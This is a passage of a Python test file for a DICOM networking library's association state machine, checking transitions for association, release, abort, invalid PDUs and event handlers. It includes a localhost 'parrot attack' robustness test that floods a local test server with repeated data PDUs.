('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt13', 'AA-6'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt13']
def test_evt14(self):
"""Test Sta13 + Evt14."""
# Sta13 + Evt14 -> <ignore> -> Sta13
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt14']
def test_evt15(self):
"""Test Sta13 + Evt15."""
# Sta13 + Evt15 -> <ignore> -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt15']
def test_evt16(self):
"""Test Sta13 + Evt16."""
# Sta13 + Evt16 -> AA-2 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('send', a_abort),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt16', 'AA-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt16']
def test_evt17(self):
"""Test Sta13 + Evt17."""
# Sta13 + Evt17 -> AR-5 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AR-5: Stop ARTIM
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt17', 'AR-5'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt17']
def test_evt18(self):
"""Test Sta13 + Evt18."""
# Sta13 + Evt18 -> AA-2 -> Sta1
# Evt18: ARTIM timer expired from <local service>
# AA-2: Stop ARTIM, close connection
commands = [
('recv', None),
('send', a_associate_rq),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt18', 'AA-2'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt18']
def test_evt19(self):
"""Test Sta13 + Evt19."""
# Sta13 + Evt19 -> AA-7 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-7: Send A-ABORT PDU to <remote>
commands = [
('recv', None),
('send', a_associate_rq),
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:4] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt6', 'AA-8'),
('Sta13', 'Evt19', 'AA-7'),
]
assert self.fsm._transitions[:3] == ['Sta4', 'Sta5', 'Sta13']
assert self.fsm._events[:4] == ['Evt1', 'Evt2', 'Evt6', 'Evt19']
class TestParrotAttack(TestStateBase):
"""Test a parrot attack on the association."""
def test_requestor(self):
commands = [
('recv', None),
('send', a_associate_ac),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', p_data_tf),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
self.assoc.start()
for ii in range(len(commands)):
scp.step()
scp.shutdown()
assert self.fsm._changes[:14] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
]
def test_acceptor(self):
"""Test hitting the acceptor with PDUs."""
# Also a regression test for #120
# C-ECHO-RQ
# 80 total length
echo_rq = (
b"\x04\x00\x00\x00\x00\x4a" # P-DATA-TF 74
b"\x00\x00\x00\x46\x01" # PDV Item 70
b"\x03" # PDV: 2 -> 69
b"\x00\x00\x00\x00\x04\x00\x00\x00\x42\x00\x00\x00" # 12 Command Group Length
b"\x00\x00\x02\x00\x12\x00\x00\x00\x31\x2e\x32\x2e\x38"
b"\x34\x30\x2e\x31\x30\x30\x30\x38\x2e\x31\x2e\x31\x00" # 26
b"\x00\x00\x00\x01\x02\x00\x00\x00\x30\x00" # 10 Command Field
b"\x00\x00\x10\x01\x02\x00\x00\x00\x01\x00" # 10 Message ID
b"\x00\x00\x00\x08\x02\x00\x00\x00\x01\x01" # 10 Command Data Set Type
)
# Send associate request then c-echo requests then release request
commands = [
('send', a_associate_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', echo_rq),
('recv', None),
('send', a_release_rq),
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.start()
for ii in range(len(commands)):
scp.step()
scp.shutdown()
assert [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt10', 'DT-2'),
('Sta6', 'Evt9', 'DT-1'),
('Sta6', 'Evt12', 'AR-2'),
('Sta8', 'Evt14', 'AR-4'),
('Sta13', 'Evt17', 'AR-5'),
] == fsm._changes[:30]
class TestStateMachineFunctionalRequestor:
"""Functional tests for StateMachine as association requestor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = 'localhost'
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.orig_ar2 = FINITE_STATE.ACTIONS['AR-2']
self.orig_ar4 = FINITE_STATE.ACTIONS['AR-4']
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
FINITE_STATE.ACTIONS['AR-4'] = self.orig_ar4
FINITE_STATE.ACTIONS['AR-2'] = self.orig_ar2
time.sleep(0.1)
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_monkey_patch(self):
"""Test monkey patching of StateMachine works as intended."""
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
fsm = self.monkey_patch(assoc.dul.state_machine)
assert fsm.current_state == 'Sta1'
fsm.current_state = 'Sta13'
fsm.do_action('Evt3')
assert fsm._changes == [('Sta13', 'Evt3', 'AA-6')]
assert fsm._transitions == ['Sta13']
def test_associate_accept_release(self):
"""Test normal association/release."""
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
if self.assoc.is_established:
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_reject(self):
"""Test normal association rejection."""
self.ae = ae = AE()
ae.require_called_aet = True
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.assoc.is_rejected
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt4', 'AE-4'), # A-ASSOC-RJ PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_accept_abort(self):
"""Test association acceptance then local abort."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
if self.assoc.is_established:
self.assoc.abort()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection closed
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # recv A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # connection closed
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_accept_local_abort(self):
"""Test association acceptance then local abort if no cx."""
self.ae = ae = AE()
ae.acse_timeout = 5
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.requestor.requested_contexts[0].abstract_syntax = '1.2.3'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta13', # Waiting for connection close
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt15', 'AA-1'), # A-ABORT rq primitive
('Sta13', 'Evt17', 'AR-5'), # Connection closed
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_associate_accept_peer_abort(self):
"""Test association acceptance then peer abort."""
self.ae = ae = AE()
ae.network_timeout = 0.5
ae.acse_timeout = 5
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 1
):
time.sleep(0.05)
timeout += 0.05
timeout = 0
while not self.assoc.is_established and timeout < 1:
time.sleep(0.05)
timeout += 0.05
timeout = 0
while not self.assoc.is_aborted and timeout < 1:
time.sleep(0.05)
timeout += 0.05
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt16', 'AA-3'), # A-ABORT-RQ PDV recv
]
scp.shutdown()
def test_associate_send_data(self):
"""Test association acceptance then send DIMSE message."""
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.send_c_echo()
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta6',
'Sta6',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt9', 'DT-1'), # P-DATA rq primitive
('Sta6', 'Evt10', 'DT-2'), # P-DATA-TF PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_release_AR6(self):
"""Test receive P-DATA-TF while waiting for A-RELEASE-RP."""
# Requestor sends A-RELEASE-RQ, acceptor sends P-DATA-TF then
# A-RELEASE-RP
# Patch AR-4 to also send a P-DATA-TF
def AR_4(dul):
# Send C-ECHO-RQ
dul.socket.send(p_data_tf)
# Normal release response
dul.pdu = A_RELEASE_RP()
dul.pdu.from_primitive(dul.primitive)
# Callback
dul.socket.send(dul.pdu.encode())
dul.artim_timer.start()
return 'Sta13'
# In this case the association acceptor will hit AR_4
FINITE_STATE.ACTIONS['AR-4'] = ('Bluh', AR_4, 'Sta13')
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
def test_release_AR7(self):
"""Test receive P-DATA primitive after A-RELEASE-RQ PDU."""
def AR_2(dul):
"""AR-2 occurs when an A-RELEASE-RQ PDU is received."""
# Add P-DATA primitive request
primitive = C_ECHO()
primitive.MessageID = 1
primitive.AffectedSOPClassUID = VerificationSOPClass
# Send C-ECHO request to the peer via DIMSE and wait for the response
dul.assoc.dimse.send_msg(primitive, 1)
# Normal AR2 response
dul.to_user_queue.put(dul.primitive)
return 'Sta8'
# In this case the association acceptor will hit AR_2
FINITE_STATE.ACTIONS['AR-2'] = ('Bluh', AR_2, 'Sta8')
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
self.assoc.release()
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm._transitions == [
'Sta4', # Waiting for connection to complete
'Sta5', # Waiting for A-ASSOC-AC or -RJ PDU
'Sta6', # Assoc established
'Sta7',
'Sta7', # Waiting for A-RELEASE-RP PDU
'Sta1' # Idle
]
assert self.fsm._changes == [
('Sta1', 'Evt1', 'AE-1'), # A-ASSOC rq primitive
('Sta4', 'Evt2', 'AE-2'), # connection confirmed
('Sta5', 'Evt3', 'AE-3'), # A-ASSOC-AC PDU recv
('Sta6', 'Evt11', 'AR-1'), # A-RELEASE rq primitive
('Sta7', 'Evt10', 'AR-6'), # P-DATA-TF PDU recv
('Sta7', 'Evt13', 'AR-3'), # A-RELEASE-RP PDU recv
]
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
class TestStateMachineFunctionalAcceptor:
"""Functional tests for StateMachine as association acceptor."""
def setup(self):
"""Run prior to each test"""
self.ae = None
ae = AE()
ae.add_requested_context(VerificationSOPClass)
ae.acse_timeout = 5
ae.dimse_timeout = 5
assoc = Association(ae, mode='requestor')
assoc.set_socket(AssociationSocket(assoc))
# Association Acceptor object -> remote AE
assoc.acceptor.ae_title = validate_ae_title(b'ANY_SCU')
assoc.acceptor.address = 'localhost'
assoc.acceptor.port = 11112
# Association Requestor object -> local AE
assoc.requestor.address = 'localhost'
assoc.requestor.port = 11113
assoc.requestor.ae_title = ae.ae_title
assoc.requestor.maximum_length = 16382
assoc.requestor.implementation_class_uid = (
ae.implementation_class_uid
)
assoc.requestor.implementation_version_name = (
ae.implementation_version_name
)
cx = build_context(VerificationSOPClass)
cx.context_id = 1
assoc.requestor.requested_contexts = [cx]
self.assoc = assoc
self.fsm = self.monkey_patch(assoc.dul.state_machine)
self.orig_entry = FINITE_STATE.ACTIONS['AE-2']
def teardown(self):
"""Clear any active threads"""
if self.ae:
self.ae.shutdown()
FINITE_STATE.ACTIONS['AE-2'] = self.orig_entry
def monkey_patch(self, fsm):
"""Monkey patch the StateMachine to add testing hooks."""
# Record all state transitions
fsm._transitions = []
fsm.original_transition = fsm.transition
def transition(state):
fsm._transitions.append(state)
fsm.original_transition(state)
fsm.transition = transition
# Record all event/state/actions
fsm._changes = []
fsm.original_action = fsm.do_action
def do_action(event):
if (event, fsm.current_state) in TRANSITION_TABLE:
action_name = TRANSITION_TABLE[(event, fsm.current_state)]
fsm._changes.append((fsm.current_state, event, action_name))
fsm.original_action(event)
fsm.do_action = do_action
return fsm
def test_invalid_protocol_version(self):
"""Test receiving an A-ASSOC-RQ with invalid protocol version."""
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
scp = ae.start_server(("", 11112), block=False)
assert self.fsm.current_state == 'Sta1'
def AE_2(dul):
dul.pdu = A_ASSOCIATE_RQ()
dul.pdu.from_primitive(dul.primitive)
dul.pdu.protocol_version = 0x0002
bytestream = dul.pdu.encode()
dul.socket.send(bytestream)
return 'Sta5'
FINITE_STATE.ACTIONS['AE-2'] = ('Bluh', AE_2, 'Sta5')
self.assoc.start()
timeout = 0
while (
not self.assoc.is_established
and not self.assoc.is_rejected
and not self.assoc.is_aborted
and not self.assoc.dul._kill_thread
and timeout < 10
):
time.sleep(0.05)
timeout += 0.05
assert self.assoc.is_rejected
assert self.assoc.acceptor.primitive.result == 0x01
assert self.assoc.acceptor.primitive.result_source == 0x02
assert self.assoc.acceptor.primitive.diagnostic == 0x02
timeout = 0
while self.fsm.current_state != 'Sta1' and timeout < 10:
time.sleep(0.05)
timeout += 0.05
assert self.fsm.current_state == 'Sta1'
scp.shutdown()
class TestEventHandling:
"""Test the FSM event handlers."""
def setup(self):
self.ae = None
def teardown(self):
if self.ae:
self.ae.shutdown()
def test_no_handlers(self):
"""Test with no handlers bound."""
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
scp.shutdown()
def test_transition_acceptor(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
assert event.event.name == 'EVT_FSM_TRANSITION'
assert event.event.description == "State machine about to transition"
states = [ee.current_state for ee in triggered]
assert states[:6] == ['Sta1', 'Sta2', 'Sta3', 'Sta6', 'Sta8', 'Sta13']
scp.shutdown()
def test_transition_acceptor_bind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
time.sleep(0.5)
child = scp.active_associations[0]
assert child.dul.state_machine.current_state == 'Sta6'
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
scp.bind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta6', 'Sta8', 'Sta13']
def test_transition_acceptor_unbind(self):
"""Test EVT_FSM_TRANSITION as acceptor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
# Confirm that the handler is bound
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
time.sleep(0.5)
# Acceptor association
child = scp.active_associations[0]
# At this point we *must* have gone Sta1 -> Sta2 -> Sta3 -> Sta6
assert child.dul.state_machine.current_state == 'Sta6'
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
# Unbind the handler and confirm that it's unbound
scp.unbind(evt.EVT_FSM_TRANSITION, handle)
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
# Should go Sta6 -> Sta8 -> Sta13
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
time.sleep(0.5)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
print(states)
assert states[:3] == ['Sta1', 'Sta2', 'Sta3']
scp.shutdown()
def test_transition_requestor(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
